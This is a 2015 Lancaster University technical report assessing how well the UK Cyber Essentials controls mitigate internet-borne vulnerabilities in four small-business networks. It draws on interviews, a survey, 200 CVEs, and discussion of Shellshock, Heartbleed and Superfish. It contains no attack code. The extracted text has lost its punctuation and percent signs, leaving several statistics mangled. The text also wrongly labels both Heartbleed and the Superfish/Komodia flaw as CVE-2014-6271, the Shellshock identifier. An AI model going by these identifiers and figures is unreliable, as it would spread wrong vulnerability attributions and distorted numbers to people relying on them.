Security Lancaster...Methodology T he scheme of work for this report has been split into the following sections: Collection of data through interviews and a survey regarding the implementation

LancasterSecurity

CYBER SECURITY CONTROLS EFFECTIVENESSA Qualitative Assessment of Cyber Essentials

Security Lancaster mdash Lancaster University

ContributorsDr Jose M Such (Principal Investigator)John VidlerTim SeabrookProf Awais RashidSecurity LancasterInfolab21 SCCLancaster UniversityLancasterLA1 4WAUnited Kingdom

Cite asSuch JM Vidler J Seabrook T Rashid A Cyber Security ControlsEffectiveness A Qualitative Assessment of Cyber Essentials TechnicalReport SCC-2015-02 Security Lancaster Lancaster University 2015

AcknowledgementsThis Cyber Security research project was funded by the UKGovernment

DisclaimerThis material is provided for general information purposes only Youshould make your own judgement as regards use of this material andseek independent professional advice on your particular circumstancesNeither the publisher nor the author nor any contributors assumeany liability to anyone for any loss or damage caused by any error oromission in the work whether such error or omission is the result ofnegligence or any other cause

ContentsExecutive Summary 2

Introduction 3Aims 3

Methodology 4Data Collection 4Vulnerabilities 4Mitigation Assessment 5

Analysis 6Full Vulnerabilities Assessment 6Case Studies 6Survey Responses 8

Analysis of Cyber Essentials on High Profile Vulnerabilities 10ldquoShellShockrdquo 10ldquoHeartbleedrdquo 10ldquoSuperfishrdquo 10Threat Analysis 11

Conclusions 12Additional Tools 12Cyber Essentials Controls 12Recommendations 12

References 13

Cyber Controls Applicability 14

CVE Details 19

Survey Responses 27

Executive SummaryFindings

This report assesses the Cyber Essentialscontrols effectiveness in mitigating cyber-threats

Two-hundred randomly selected internet-originating vulnerabilities are analysed formitigation across four SME networks with andwithout the Cyber Essentials controls in placeA network built from survey responses is usedto assess the typicality of the SME networksas well as to develop a broader understandingof typical SME network configurations andsecurity-practice

The aggregated results show that withoutthe Cyber Essentials controls none of the

attacks assessed were mitigated on anynetwork This more than anything elseshould be understood by SMEs taking noaction to combat cyber threats simply isnrsquot anoption

With the CE tools more than 99of the vulnerabilities in SMEs interviewedwere mitigated as shown in the figure belowwhich depicts the aggregated results across allcases studied The approx 13 of exploitsonly partially mitigated rely on hardware orsoftware vendors to release patches succinctlyand effectively to combat any vulnerabilities

Once the vendor has released a security

patch the Patch Management componentof Cyber Essentials ensures that the systemreturns to a secure state However up until apatch is released there remains a vulnerabilityin the network For this reason it shouldbe stressed for SMEs to frequently considerwhat services or software is installed whetherit is necessary and whether a more securealternative is available

The few vulnerabilities not mitigated byCyber Essentials are as such because offundamental hard-coded flaws in hardware orsoftware that are unable to be updated orpatched to a secure state

Figure 1 Cyber Essentials Aggregated Vulnerability Mitigation Results

Recommendations

Although the Cyber Essentials tools havebeen shown to successfully mitigate thevast majority of the attacks assessed it isimportant to note that only rsquocommodity-levelrsquoexploits (as defined by the Cyber EssentialsFramework)[10] viable for a remote attackhave been considered

The scope of this report does notaddress vulnerability to insider threats socialengineering physically proximate attackersor other targeted-attacks it may berecommended that a follow-up study with awider scope be carried out to investigate therisks from other forms of attack with the useof Cyber Essentials

The rsquo10 Steps to Cyber Securityrsquo reportpublished by CESG[2] highlights that inorder to maximise the security of a networkit is essential to not only consider theprevention of attacks with the use of toolsbut to also ensure that all employees areadequately educated in network securityand treated with scrutiny through accesslogs and data-loss-prevention schemes inorder to achieve a secure business in the faceof potential local and remote attacks Wewould recommend that especially for largerorganisations additional security measuressuch as these be put in place

For hardware or software identified as

inherently flawed resulting in unmitigatablevulnerabilities our recommendation is thatthese pieces of software or hardware beavoided at all costs when developing an SMEnetwork In addition a global list of un-safe products could be collectively developedand made publicly available This relates toour last recommendation of integrating CyberEssentials further with collective securityapproaches such as The Cyber-securityInformation Sharing Partnership (CiSP)[4]These approaches keep SMEs with the latestinformation about vulnerabilities and othercyber-threat information

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 2 of 28

IntroductionC

yber Essentials was introduced asa government funded scheme firstpublished in April 2014 as an interest

of national security to bolster UK securityin cyberspace The Cyber Essentialsscheme was developed in collaboration withthe Information Assurance for Small andMedium Enterprises (IASME) consortiumthe Information Security Forum (ISF) andthe British Standards Institution (BSI) as aset of basic technical security controls fororganisations to utilize for the mitigation ofthe lsquobottom 80rsquo of remote cyber-threats[3]

The scheme built to provide animplementable of the 10-steps to Cyber-Security[1] was released as part of the2011 UK Cyber Security Strategy[16] andis being backed by the UK government asan organisational standard Thus far it hasbeen adopted by several large organisationsincluding Vodafone Hewlett-Packard (HP)BAE Systems Virgin Media and Barclays[5]

The Cyber Essentials accreditation hasbeen made mandatory from October 1st

2014 for all suppliers of government contractsinvolving ldquothe handling of sensitive andpersonal information and provision of certaintechnical products and servicesrdquo[17]

The Cyber Essentials security controls aresummarised as follows[7]

Firewalls and GatewaysThese are devices designed to preventunauthorised access to or from privatenetworks but good setup of thesedevices either in hardware or softwareform is important for them to be fullyeffective

Secure configurationEnsuring that systems are configured inthe most secure way for the needs ofthe organisation

Access controlEnsuring only those who should haveaccess to systems to have access and atthe appropriate level

Malware protectionEnsuring that virus and malwareprotection is installed and is it up todate

Patch managementEnsuring the latest supported version ofapplications is used and all the necessarypatches supplied by the vendor beenapplied

Figure 2 Cyber Essentials Security Tools

The intended scope of Cyber Essentialsis outlined in the Cyber Essentials SchemeAssurance Framework[10] This states thatthe CE controls are considered as applicableto all sizes of Enterprise as a base level ofprotection against cyber-attacks upon whichindividual organisations may build on withfurther tools network devices or protocols forthe mitigation of targeted attacks The CEScheme is clear in its inclusion of lsquoBring your

own Devicersquo network setups to scope as wellas Cloud-based services and off-the-shelf webapplications Bespoke IT systems such as inmanufacturing and retail are applicable to CEbut hold additional vulnerabilities due to theirnature that are not to be considered

The purpose of this report is to investigatethe effectiveness of the Cyber Essentialscontrols in mitigating lsquocommodity-levelrsquoattacks attempting to exploit vulnerabilitiesin Small and Medium Enterprise (SME)networks

A commodity-level attack has been definedby CESG[8] as

Any unauthenticated remote attackexploiting a known vulnerability withthe use of tools and techniques openlyavailable for download or purchaseon the internet - and that do notrequire extensive specialist knowledge toconduct1

To effectively assess Cyber Essentials itis firstly necessary to understand the typicalnetwork configurations of SMEs Interviewswith SMEs were carried out to build abstractednetwork models and a survey has beenconducted to build a broader picture of SMEnetwork deployments The survey resultswill help to develop our understanding ofcurrent security practice and cyber-awarenessas well as to build a general-case SME networkwith which to analyse the typicality of SMEsinterviewed

The networks modelled from collected dataare to be considered with and without the useof the Cyber Essentials security controls tocomparatively establish the protection grantedwith the adoption of the CE scheme

1This includes attacks utilising pen-testing software such as Metasploit Kali and the Poison Ivy remote access tool which are capable of scanning network nodes for publiclyknown vulnerabilities in the operating system applications or services in use

MethodologyT

he scheme of work for this report has beensplit into the following sections

bull Collection of data through interviews anda survey regarding the implementationand deployment of networks in real-worldSMEs for use in designing paper-modelsto be analysed

bull Composition of a list of suitablevulnerabilities that contains applicablemethods by which remote attackers canexploit commodity-level attacks

bull Assessment of vulnerability mitigation forSME networks with and without the useof the CE Tools

Data Collection

In order to analyse the effectiveness of theCyber Essentials Security Tools four real-world SME networks have been modelledModels have been composed using informationgathered in interviews and abstracted toreduce redundant complexity and removeany linkage with the SME In addition ageneralisable SME model was composed fromSurvey responses to serve as a baselinenetwork from which all SME networks maybe adapted

Interviews

The interviews were composed with the goalof firstly understanding the layout or topologyof the network deployed by an SME To thenbuild on the network configuration it wasimportant to understand how the network isused - where remote connections take placehow local services are utilised and how anattacker sees the network Hardware vendorsoperating systems and version numbers wereconsidered to build a greater understanding ofthe network

Additional questions were posed toexamine the current state of security on thenetwork such as any security accreditationsprevious breaches and how often updates arerolled out

Survey

The Survey was constructed as a stripped-down questionnaire representing the essenceof the questions posed in the Interviews Thisincluded details of the number of workstationsat the SME to gauge its size the localand remote services available the operatingsystems used on the service providers andworkstations the current security policies in

place and the respondentsrsquo awareness of theCE Scheme

Two surveys were sent out one to a securelist of SMEs in the NW Security Cluster[9]and another publicly to closed groups ofsecurity-interested SME representatives

Vulnerabilities

A total of 200 random vulnerabilitieshave been equally taken from two annualvulnerability lists of CVE-2013 and CVE-2014 published by Mitre2 Any vulnerabilitiesfound to be unsuitable for analysis have beenreplaced by a new candidate

In this report we use the Mitreorganisation definition for a vulnerabilitywhich they state as

An information securityldquovulnerabilityrdquo is a mistake in softwarethat can be directly used by ahacker to gain access to a system ornetwork CVE considers a mistake avulnerability if it allows an attackerto use it to violate a reasonablesecurity policy for that system (thisexcludes entirely ldquoopenrdquo security

2CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security

Figure 3 Methodology for Assessing Cyber Essentials

policies in which all users are trustedor where there is no consideration ofrisk to the system)

(As shown on Mitreorgrsquos Terminologypage[6] in March rsquo15)

To warrant a CVE entry into the Mitrelist individual vulnerabilities must place theaffected system (or systems) in to a statewhich either

bull allows an attacker to executecommands as another user

bull allows an attacker to access data that iscontrary to the specified access restrictionsfor that data

bull allows an attacker to pose as anotherentity

bull allows an attacker to conduct a denialof service

High-Profile Vulnerabilities

Three specific high-profile vulnerabilities werealso taken in addition to the randomly chosen200 and have been assessed to what extentthe Cyber Essentials scheme would affect thevulnerability of SMEs in these situations

Additionally the applicability of thesevulnerabilities to the SME networks we studiedis included along with the respective potentialto harm operations

Mitigation Assessment

The Vulnerabilities chosen have beenqualitatively assessed for mitigation withand without the use of the Cyber Essentialscontrols The process considers each

component of the controls in asserting whethereach vulnerability would be mitigated partiallymitigated or not mitigated The results aredouble-vetted to ensure correctness

For each of the SMEs Interviewed each ofthe vulnerabilities are assessed for applicabilityto that network configuration In cases wherethe vulnerability is for a specific model ofhardware the network is deemed applicable ifit uses a like-product from the same vendorIn cases where the vulnerability is in softwareonly those referencing software in-use or likelyin-use (based on the SMErsquos practice) aredeemed applicable to the network

AnalysisT

he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to

ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)

What follows is an analysis into theinformation gathered from interviews FourSMEs from distinct industries are detailed inphysical infrastructure and service usage aswell as current user access policies and existingsecurity measures in place A summary of themitigation results in vulnerabilities in softwareand hardware used for each SME networkconfiguration is included

The full table for the applicability of allCVE vulnerabilities to each of the networkstructures can be found in the CVE Detailssection on page 19

Finally the data collected from the surveyis analysed and used to develop a general-case network model the SME networks arecompared to this to better understand thenuances of each market sector as well theoverall typical configuration of SMEs

Full Vulnerabilities Assessment

Of the entire list of 200 vulnerabilities from2013 and 2014 deemed as applicable tothe study and chosen for analysis 131vulnerabilities were mitigated with the useof the Cyber Essentials Security Tools 61vulnerabilities were partially mitigated and 8were not mitigated

Figure 4 Percentage of Full Vulnerabilities ListMitigated

Partially Mitigated 59 of the 61 CVEsjudged as partially mitigated are as suchbecause they rely of patches from third-party software or hardware vendors butthat will be mitigated once a security fixhas been released Despite any level ofsecurity tools being deployed on a network thesecurity involved in using third party softwareunfortunately relies on the vendorrsquos ability toidentify potential areas of risk as well asto quickly respond to security breaches as

they become apparent with the release ofpatches All software installed on an SMEnetwork should be periodically reviewed todecide whether it is necessary - or if thereare more suitable and potentially more securesolutions available

The other two partially mitigatedvulnerabilities rely on website blacklistingcombined with avoiding vulnerable webbrowser software A secure configurationwithout such a browser would mitigate thisvulnerability but as in the Web DevelopmentSME case study it may not always be possibleto avoid the use of a specific software pieceIn a case as this website blacklisting is theonly defence against the vulnerabilities

Not Mitigated - Secure ConfigurationSome vulnerabilities have been found to beunmitigatable using the CE controls in each ofthe found cases this is due to inherent flaws ina hardware device or software that can not befixed by a security patch or firmware update

For these devices that are fundamentallyflawed from a cyber-security stand-point itcan be that no level of security tools on top ofthe network can aid in mitigation - rather thehardware should be replaced to ensure networksecurity It may be possible for a public list ofall such devices to be developed as part of thegovernment cyber-security scheme - to serveas a device-blacklist for SMEs

Case Studies

Four SMEs were interviewed to build paper-models upon which the Cyber Essentialscontrols may be assessed Some detail on thephysical structure usage and existing securityof each network is provided

bull SME Network One represents a financespecialist SME using a combination ofexternally managed services for bankingin addition to internal remotely accessibleinternal services for employees

bull SME Network Two represents a specialistSME utilizing an off-site remotely managedserver for administrator services and cloud-based services for employees

bull SME Network Three represents a webservices SME that accesses client serversfrequently and utilises cloud-basedservices daily

bull SME Network Four represents a hospitalityservices provider with a very smallcompany network co-located with a verylarge guest network component where allof the services are remotely managed andlocated

SME Network One - Finance Sector

Physical Infrastructure The companyinterviewed comprised around 20 employeeslocated at 3 sites nationally

Remote workers connect over normalinternet connections both residential andcommercial and use both VPN and non-VPNtraffic (specifically web traffic on port 80) toaccess services supplied by the company

Figure 5 SME-1 Network

The hardware at the head office (wherethe interview was carried out) consists ofequipment by 3Com Draytek BT and Heuwaifor infrastructure components Employees usea range of machines bought between 2011and 2014 comprising a mix of Dell and LenovoPCs

As most of the infrastructure is passive(most of the traffic is handled by a single3Com BaseT-1000 switch) the firmware onthe equipment is unchanged from purchase ifany firmware is present at all

Services At the head office site a WindowsFile Server (SAMBA) server provides local filesharing and allows remote users to accessthe same files via VPN The mail servera Microsoft Exchange Server is an off-sitedeployment managed by an external companybut is a dedicated server for only this company

Additionally a web service and databaseserver is run from a server at the site Thisprovides both local HTTP access to thedatabase it runs as well as having firewallrules put in place to allow external access tothe same system for off-site employees

Numerous other pieces of banking softwareare run on bank-owned remote servers andare accessed and secured via combinationsof smart cards and PIN entry devices alsosupplied by the banks

User Access Employees are permitted toaccess the internet from both their individualworkstations and additional devices such assmart phones (although technically this is notpermitted by policy but this policy is notstrictly enforced) Internet access is howeverslightly filtered with access to Facebook beingblocked by the router

Access logs for any network operations arenot created and any machine in the office canaccess the network with no isolated islands

User accounts can be migrated betweenmachines via a Domain Controller but inpractice this is unlikely to actually happenwith users generally using their own machines

Operating systems Locally everything isWindows 7 the remote site uses Windows7 2 remote machines are Windows 81

Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 119 wereapplicable to the first SME network

Figure 6 SME-1 Vulnerability Mitigation

Because much of this SMEs operationsare done via browser-based interfaces to otherfinancial companies (such as banks) it placesthem in the firing line for a large number ofthe browser based attacks Furthermore assome banks require specific browser versionsfor their interfaces to work they end upwith several different browsers with severalversions of each to cover all their requirementsopening them up multiple times to browser-based vectors

Additionally the heavy use of SSL-basedcommunication places them in a positionwhere any SSL vulnerabilities affect them too

SME Network Two - Specialist Group

Physical Infrastructure The second SMEparticipant employs 20-25 based acrossmultiple offices in one building

Employees may bring their own devices oruse a workstation provided Workstations areconnected to one of four switches via Ethernetand share a virtual LAN with other employeedevices An off-site server containing sensitivedata is accessible only to administrators viaSSH

Network Equipment includes an externalDell PowerEdge Server four TPLink SwitchAccess Points and a TPLink DHCP Router

Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows XP Windows 7 amp Windows 8 withauto-updates enabled

Some Employee use of VPN to connectto another network for a data service Allother services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily

User Access Employees have no restrictionon their internet access and may use theirown equipment Administrators often accessa remote server database and file store actingas a web server Guests may access a separateWi-Fi network through the same access pointsas other office workers but do not sharethe same virtual LAN as employees Wi-Fiaccess logs are gathered but no other useractivity Employees can access the networkfrom any machine but the SMErsquos policy isthat all machines should have anti-malwareand strong passwords which are recommendedto be changed periodically with the employeemachines configured to automatically lockafter a period of inactivity

Mitigation of applicable vulnerabilitiesOf the 200 listed vulnerabilities 79 wereapplicable to the second SME network

The specialist SME had the fewest overallpotential vulnerabilities largely owed toa higher reliance on cloud-based servicesAlthough this reduces the risk from inherentvulnerability in a network responsibility ishanded onto the service provider chosen Acertified and reputable cloud services providershould thus be sought to ensure protectionthrough the entire chain

SME Network Three - Web Development

Physical Infrastructure SME-3 employs 10workers based in one building

Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices

Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router

Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled

All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily

User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing

Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and

strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity

Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network

The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place

When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content

SME Network Four - Hotel Services

Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment

The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router

Services No local servers are present toprovide any service to employees or guestson the network

File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite

All the services are accessed with SSLsecured connections (HTTPS mainly)

User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either

Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others

Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed

Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web

Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal

For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack

Survey Responses

Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27

Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK

Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely

User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany

Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations

Almost two-thirds of survey participantswere previously aware of Cyber Essentials

Survey Respondents Network

The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations

Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services

Figure 13 Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent

The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers

The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or

data that is stored remotely the workplace

The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients

The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence

Analysis of CyberEssentials on High ProfileVulnerabilitiesT

he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015

These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected

With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities

ldquoShellShockrdquo

Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner

GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix

CVE-2014-6271[13]

The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack

The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised

ldquoHeartbleedrdquo

Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget

As described in the original CVE report

The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug

CVE-2014-6271[12]

As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack

Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments

Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses

or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects

It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect

ldquoSuperfishrdquo

The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products

CVE-2014-6271[14]

This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment

The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same

certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine

Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice

Threat Analysis

ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside

service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit

With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes

Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers

In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines

SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications

Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue

ConclusionsT

he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all

vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference

Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security

The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance

Additional Tools

The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for

such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations

There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities

An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security

Cyber Essentials Controls

Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security

Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety

Recommendations

To further improve cyber-security across theUK we recommend that

1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner

2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks

3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report

References[1] Centre for the Protection of

National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk

governmentpublicationscyber-

risk-management-a-board-level-

responsibility September 2012

[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov

ukgovernmentpublicationscyber-

[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww

govukgovernmentnewscyber-

security-boost-for-uk-firmsJanuary 2015

